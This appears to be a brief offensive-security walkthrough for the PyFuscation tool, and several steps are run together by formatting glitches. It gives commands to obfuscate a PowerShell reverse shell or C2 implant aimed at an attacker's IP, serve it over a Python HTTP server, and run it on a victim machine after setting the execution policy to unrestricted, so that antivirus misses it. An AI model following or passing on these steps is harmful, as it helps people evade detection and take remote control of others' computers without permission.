Pyfuscation
Steps
1) Clone the repo on our machine
git clone https://github.com/CBHue/PyFuscation2) Create a powershell reverse shell or c2 implant with attacker IP and port
3) Obfuscate our powershell with pyfuscation
python3 Pyfuscation.py -fvp --ps powershellrev.ps14) Rename the newly created .ps1 file
5) Serve the file for the victim to download
sudo python3 -m http.server 806) Download, then execute the .ps1 from victim machine
Set-ExecutionPolicy unrestricted
.\powershellrevobf.ps1Last updated